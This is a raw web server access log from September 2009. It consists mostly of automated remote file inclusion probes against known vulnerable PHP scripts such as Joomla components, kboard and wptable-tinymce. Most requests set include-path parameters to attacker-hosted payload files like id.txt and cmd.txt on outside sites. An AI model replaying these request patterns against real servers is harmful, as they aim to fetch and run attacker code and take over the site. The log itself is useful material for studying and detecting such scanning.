94.136.37.141 - - [08/Sep/2009:05:05:11 -0500] "GET /bb_lib/checkdb.inc.php?libpach=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
218.38.136.251 - - [08/Sep/2009:05:05:14 -0500] "GET /logs/kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
218.38.136.251 - - [08/Sep/2009:05:05:14 -0500] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
94.136.37.141 - - [08/Sep/2009:05:05:15 -0500] "GET /logs/access_log.1238112000/bb_lib/checkdb.inc.php?libpach=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
94.136.37.141 - - [08/Sep/2009:05:05:57 -0500] "GET /bb_lib/checkdb.inc.php?libpach=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
94.136.37.141 - - [08/Sep/2009:05:05:57 -0500] "GET /logs/bb_lib/checkdb.inc.php?libpach=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
94.136.37.141 - - [08/Sep/2009:05:05:57 -0500] "GET /logs/access_log.1243987200/bb_lib/checkdb.inc.php?libpach=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
94.136.37.141 - - [08/Sep/2009:05:06:04 -0500] "GET /logs/access_log.1238112000/bb_lib/checkdb.inc.php?libpach=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:05:06:24 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:05:06:24 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:05:06:25 -0500] "GET /logs/access_log.1243814400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:05:06:30 -0500] "GET /logs/access_log.1244505600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:05:06:56 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:05:06:57 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:05:06:57 -0500] "GET /logs/access_log.1243814400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
199.120.90.223 - - [08/Sep/2009:05:07:08 -0500] "GET /logs/access_log.1244505600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
216.65.20.79 - - [08/Sep/2009:05:09:11 -0500] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 311 "-""libwww-perl/5.814"
216.65.20.79 - - [08/Sep/2009:05:09:11 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 316 "-""libwww-perl/5.814"
216.65.20.79 - - [08/Sep/2009:05:09:41 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.814"
216.65.20.79 - - [08/Sep/2009:05:09:41 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.814"
219.85.63.226 - - [08/Sep/2009:05:10:38 -0500] "GET /logs/access_log.1232755200///config/dbutil.bck.php?confdir=http://mayainfo.co.cc/cmd.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
219.85.63.226 - - [08/Sep/2009:05:10:39 -0500] "GET ///config/dbutil.bck.php?confdir=http://mayainfo.co.cc/cmd.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
219.85.63.226 - - [08/Sep/2009:05:10:39 -0500] "GET /logs///config/dbutil.bck.php?confdir=http://mayainfo.co.cc/cmd.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
118.45.190.166 - - [08/Sep/2009:05:11:23 -0500] "GET //_conf/core/common-tpl-vars.php?confdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
118.45.190.166 - - [08/Sep/2009:05:11:23 -0500] "GET /logs/access_log.1241481600//_conf/core/common-tpl-vars.php?confdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
118.45.190.166 - - [08/Sep/2009:05:11:23 -0500] "GET /logs//_conf/core/common-tpl-vars.php?confdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
94.100.181.103 - - [08/Sep/2009:05:11:35 -0500] "GET /logs/access_log.1229990400 HTTP/1.1" 200 112089 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.0.4) Gecko/20060628 Firefox/1.5.0.4"
94.100.181.103 - - [08/Sep/2009:05:11:36 -0500] "GET /favicon.ico HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.0.4) Gecko/20060628 Firefox/1.5.0.4"
94.100.181.103 - - [08/Sep/2009:05:11:36 -0500] "GET /favicon.ico HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.0.4) Gecko/20060628 Firefox/1.5.0.4"
94.100.181.103 - - [08/Sep/2009:05:11:36 -0500] "GET /favicon.ico HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.0.4) Gecko/20060628 Firefox/1.5.0.4"
94.100.181.103 - - [08/Sep/2009:05:11:38 -0500] "GET /favicon.ico HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.0.4) Gecko/20060628 Firefox/1.5.0.4"
94.100.181.103 - - [08/Sep/2009:05:11:38 -0500] "GET /favicon.ico HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.0.4) Gecko/20060628 Firefox/1.5.0.4"
118.45.190.166 - - [08/Sep/2009:05:12:05 -0500] "GET /logs/access_log.1240272000//_conf/core/common-tpl-vars.php?confdir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
65.55.107.182 - - [08/Sep/2009:05:13:34 -0500] "GET /logs/access_log.1189296000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
219.85.63.226 - - [08/Sep/2009:05:15:03 -0500] "GET //index2.php?mosConfig_absolute_path=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
219.85.63.226 - - [08/Sep/2009:05:15:03 -0500] "GET /logs//index2.php?mosConfig_absolute_path=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
218.38.136.251 - - [08/Sep/2009:05:18:11 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
218.38.136.251 - - [08/Sep/2009:05:19:25 -0500] "GET /logs///administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 350 "-""libwww-perl/5.65"
218.38.136.251 - - [08/Sep/2009:05:19:25 -0500] "GET ///administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 345 "-""libwww-perl/5.65"
218.38.136.251 - - [08/Sep/2009:05:19:48 -0500] "GET //bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
128.177.11.182 - - [08/Sep/2009:05:21:08 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunci-motori.it/baner.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:05:21:08 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunci-motori.it/baner.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:05:21:08 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunci-motori.it/baner.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:05:21:15 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunci-motori.it/baner.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.86.17.106 - - [08/Sep/2009:05:21:28 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
74.86.17.106 - - [08/Sep/2009:05:21:28 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
74.86.17.106 - - [08/Sep/2009:05:21:28 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.86.17.106 - - [08/Sep/2009:05:21:29 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.86.17.106 - - [08/Sep/2009:05:21:38 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
74.86.17.106 - - [08/Sep/2009:05:21:38 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
74.86.17.106 - - [08/Sep/2009:05:21:38 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.86.17.106 - - [08/Sep/2009:05:21:39 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.86.17.106 - - [08/Sep/2009:05:21:40 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
74.86.17.106 - - [08/Sep/2009:05:21:40 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
74.86.17.106 - - [08/Sep/2009:05:21:40 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
74.86.17.106 - - [08/Sep/2009:05:21:41 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:05:22:06 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
66.207.172.166 - - [08/Sep/2009:05:22:29 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
66.207.172.166 - - [08/Sep/2009:05:22:29 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
66.207.172.166 - - [08/Sep/2009:05:22:29 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
66.207.172.166 - - [08/Sep/2009:05:22:30 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
64.6.232.171 - - [08/Sep/2009:05:22:54 -0500] "GET /logs//wptable-tinymce.php?ABSPATH=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
64.6.232.171 - - [08/Sep/2009:05:22:54 -0500] "GET //wptable-tinymce.php?ABSPATH=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
64.6.232.171 - - [08/Sep/2009:05:22:54 -0500] "GET /logs/access_log.1246579200//wptable-tinymce.php?ABSPATH=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
208.64.216.6 - - [08/Sep/2009:05:23:00 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:05:23:00 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:05:23:00 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:05:23:04 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
64.6.232.171 - - [08/Sep/2009:05:23:11 -0500] "GET /logs/access_log.1246579200//wptable-tinymce.php?ABSPATH=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
64.6.232.171 - - [08/Sep/2009:05:23:11 -0500] "GET /logs//wptable-tinymce.php?ABSPATH=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
64.6.232.171 - - [08/Sep/2009:05:23:11 -0500] "GET //wptable-tinymce.php?ABSPATH=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
128.177.11.182 - - [08/Sep/2009:05:23:13 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.scss.sk//plugins/baner.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:05:23:13 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.scss.sk//plugins/baner.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:05:23:13 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.scss.sk//plugins/baner.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
128.177.11.182 - - [08/Sep/2009:05:23:15 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.scss.sk//plugins/baner.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:05:23:39 -0500] "GET /logs/access_log.1228608000//kboard/kboard.php?board=free&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
218.38.136.251 - - [08/Sep/2009:05:23:39 -0500] "GET //kboard/kboard.php?board=free&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 301 "-""libwww-perl/5.65"
218.38.136.251 - - [08/Sep/2009:05:23:40 -0500] "GET /logs//kboard/kboard.php?board=free&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
218.38.136.251 - - [08/Sep/2009:05:23:43 -0500] "GET /logs/access_log.1228608000/kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
218.38.136.251 - - [08/Sep/2009:05:23:43 -0500] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
218.38.136.251 - - [08/Sep/2009:05:23:44 -0500] "GET /logs/kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
209.139.209.74 - - [08/Sep/2009:05:24:25 -0500] "GET //wptable-tinymce.php?ABSPATH=http://a4zone.co.kr/siteimg/main/shit.png??%0D?? HTTP/1.1" 404 303 "-""libwww-perl/5.813"
209.139.209.74 - - [08/Sep/2009:05:24:25 -0500] "GET /logs/access_log.1246579200//wptable-tinymce.php?ABSPATH=http://a4zone.co.kr/siteimg/main/shit.png??%0D?? HTTP/1.1" 404 330 "-""libwww-perl/5.813"
209.139.209.74 - - [08/Sep/2009:05:24:25 -0500] "GET /logs//wptable-tinymce.php?ABSPATH=http://a4zone.co.kr/siteimg/main/shit.png??%0D?? HTTP/1.1" 404 308 "-""libwww-perl/5.813"
209.172.33.230 - - [08/Sep/2009:05:25:42 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
209.172.33.230 - - [08/Sep/2009:05:25:42 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.812"
211.189.18.73 - - [08/Sep/2009:05:26:28 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:05:26:28 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
219.85.63.226 - - [08/Sep/2009:05:27:11 -0500] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
219.85.63.226 - - [08/Sep/2009:05:27:11 -0500] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
211.189.18.73 - - [08/Sep/2009:05:28:06 -0500] "GET /logs/access_log.1246579200//wptable-tinymce.php?ABSPATH=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:05:28:06 -0500] "GET /logs//wptable-tinymce.php?ABSPATH=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:05:28:06 -0500] "GET //wptable-tinymce.php?ABSPATH=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.78.116.209 - - [08/Sep/2009:05:28:07 -0500] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.78.116.209 - - [08/Sep/2009:05:28:07 -0500] "GET /logs/access_log.1236211200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
121.78.116.209 - - [08/Sep/2009:05:28:07 -0500] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:05:28:08 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:05:28:08 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
121.78.116.209 - - [08/Sep/2009:05:28:12 -0500] "GET /logs/access_log.1237075200//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
72.3.216.19 - - [08/Sep/2009:05:28:15 -0500] "GET /zentrack/index.php?configFile=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
72.3.216.19 - - [08/Sep/2009:05:28:15 -0500] "GET /logs/access_log.1244937600/zentrack/index.php?configFile=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.3.216.19 - - [08/Sep/2009:05:28:15 -0500] "GET /logs/zentrack/index.php?configFile=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
72.3.216.19 - - [08/Sep/2009:05:28:15 -0500] "GET /logs/access_log.1238112000/zentrack/index.php?configFile=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
80.172.236.56 - - [08/Sep/2009:05:28:19 -0500] "GET /logs/access_log.1241222400/?INCLUDE_FOLDER=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.831"
80.172.236.56 - - [08/Sep/2009:05:28:19 -0500] "GET /?INCLUDE_FOLDER=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.831"
80.172.236.56 - - [08/Sep/2009:05:28:21 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 200 204197 "-""libwww-perl/5.831"
211.189.18.73 - - [08/Sep/2009:05:29:26 -0500] "GET /logs//wptable-tinymce.php?ABSPATH=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:05:29:26 -0500] "GET //wptable-tinymce.php?ABSPATH=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:05:29:26 -0500] "GET /logs/access_log.1246579200//wptable-tinymce.php?ABSPATH=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.189.18.73 - - [08/Sep/2009:05:29:29 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:05:29:29 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:05:29:48 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
211.189.18.73 - - [08/Sep/2009:05:29:48 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
65.55.106.181 - - [08/Sep/2009:05:30:32 -0500] "GET /logs/access_log.1145232000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.90.115.6 - - [08/Sep/2009:05:31:04 -0500] "GET //include/lib.inc.php?site_path=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:05:31:04 -0500] "GET /logs//include/lib.inc.php?site_path=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:05:31:04 -0500] "GET /logs/access_log.1237075200//include/lib.inc.php?site_path=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
219.85.63.226 - - [08/Sep/2009:05:31:08 -0500] "GET //sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
219.85.63.226 - - [08/Sep/2009:05:31:09 -0500] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
66.90.115.6 - - [08/Sep/2009:05:31:30 -0500] "GET /logs/access_log.1236211200//include/lib.inc.php?site_path=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:05:32:23 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
218.38.136.251 - - [08/Sep/2009:05:32:23 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
